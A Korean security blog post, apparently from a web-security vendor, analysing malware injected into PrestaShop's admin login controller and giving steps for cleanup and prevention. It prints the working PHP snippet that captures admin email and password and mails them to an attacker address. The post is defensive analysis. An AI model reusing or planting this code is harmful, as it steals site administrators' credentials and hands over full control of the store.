Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

PrestaShop 관리자 계정 탈취 멀웨어 완벽 분석 및 대처 가이드 [2021]

PrestaShop은 꾸준히 성장 중인 전자상거래 플랫폼인 만큼, 정보 탈취를 노리는 해커들의 주요 표적이 되고 있습니다. 일반적으로 공격 목표는 신용카드 번호지만, 최근 저희 리서치 팀은 PrestaShop 사이트를 겨냥해 사이트 관리자 계정 정보를 훔치는 새로운 유형의 자격 증명 탈취(Credential Stealing) 멀웨어를 발견했습니다. 이 악성코드에 감염되면 웹사이트가 통째로 해커에게 넘어갈 수 있습니다.

PrestaShop 자격 증명 탈취 멀웨어의 작동 원리

이번에 발견된 멀웨어는 PrestaShop 사이트의 ./controllers/admin/AdminLoginController.php 파일에 아래와 같은 형태로 삽입되어 있었습니다.

public function processLogin()
   {
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "admin@wsxdn.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <admin@wsxdn.com>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

이 코드는 로그인 과정에서 입력되는 서버 정보를 변수에 담아 처리합니다. 여기에는 PrestaShop 백오피스(관리자 페이지)에 로그인할 때 사용되는 아이디와 비밀번호도 포함됩니다. 수집된 정보는 PHP의 mail() 함수를 통해 해커의 이메일 주소로 전송됩니다.

공격자에게 전송되는 이메일에는 해킹된 PrestaShop 사이트에 로그인하기 위해 필요한 모든 정보가 담겨 있습니다. 이를 통해 공격자는 관리자 권한을 손에 넣게 되며, 웹사이트 백엔드 인터페이스에 대한 완전한 접근 권한을 확보합니다. 그 결과 콘텐츠 변조, 가짜 또는 감염된 모듈·플러그인 설치 등 사실상 모든 작업이 가능해집니다.

일부 피해 사이트의 경우 반송(bounce back) 이메일이 수신되기 시작했다는 사례도 있었는데, 이는 구글이 공격을 탐지하고 관련 계정을 비활성화하거나 신고했기 때문으로 추정됩니다.

이번 멀웨어 유포 캠페인을 진행한 공격자·해킹 그룹은 bajatx / B4JAT4T로 알려져 있습니다.

PrestaShop 자격 증명 탈취 멀웨어 감염 후 복구 방법

1. 정화 작업 전에 사이트 백업부터 확보하세요.

복구 작업 중 사용자가 감염된 페이지에 접속하지 않도록 웹사이트를 일시적으로 오프라인 상태로 전환하는 것이 좋습니다. 핵심 파일과 데이터베이스 전체를 반드시 백업하고, 가능하면 .zip처럼 압축된 형식으로 저장해 두는 것이 안전합니다.

2. 코어, 플러그인, 테마 파일을 교체하세요.

감염된 코어 파일은 신뢰할 수 있는 출처에서 받은 정품 버전으로 교체해야 합니다. 최신 버전의 파일 및 디렉터리를 내려받은 뒤 기존 파일을 삭제하면 됩니다. 이번 멀웨어는 코어 파일 내부에 악성 코드가 심어지는 방식으로 동작하기 때문에, 이 과정은 특히 중요합니다.

3. 의심스럽거나 최근 수정된 파일을 정리하세요.

최근에 수정된 파일들을 점검하면 잠재적으로 감염된 파일을 발견할 수 있습니다. 해당 파일은 깨끗한 백업본이나 신뢰할 수 있는 소스에서 복원하세요.

4. 멀웨어 검사를 실행하세요.

웹 서버 전체에 대해 멀웨어 및 악성 파일 검사를 수행하세요. 호스팅 업체가 제공하는 cPanel의 'Virus Scanner' 도구를 활용하거나, Astra Pro 플랜 같은 전문 서비스를 통해 공격 시도는 물론 탈취된 데이터를 다운로드하려는 봇까지 차단받을 수 있습니다.

위 단계 외에도 PrestaShop 보안에 관한 별도 가이드를 참고하시면 큰 도움이 됩니다.

추가 공격 예방 방법

사이트 복구를 마쳤다면, 아래의 보안 수칙을 실천하여 PrestaShop 자격 증명 탈취 멀웨어로부터 웹사이트를 안전하게 지키세요.

  • 소프트웨어를 항상 최신 버전으로 유지하기
  • 신뢰할 수 있는 제3자 결제 서비스 사용하기
  • 정기적인 멀웨어 검사 및 보안 감사 실시하기
  • 방화벽 구축에 투자하기

끊임없이 진화하는 해커의 공격 기법으로부터 웹사이트를 확실하게 보호하는 유일한 방법은 보안에 대한 지속적인 투자입니다. 웹 방화벽 설치, 잦은 멀웨어 검사, 정기적인 보안 감사를 병행하면 웹사이트 전반의 보안 상태를 효과적으로 점검하고 강화할 수 있습니다.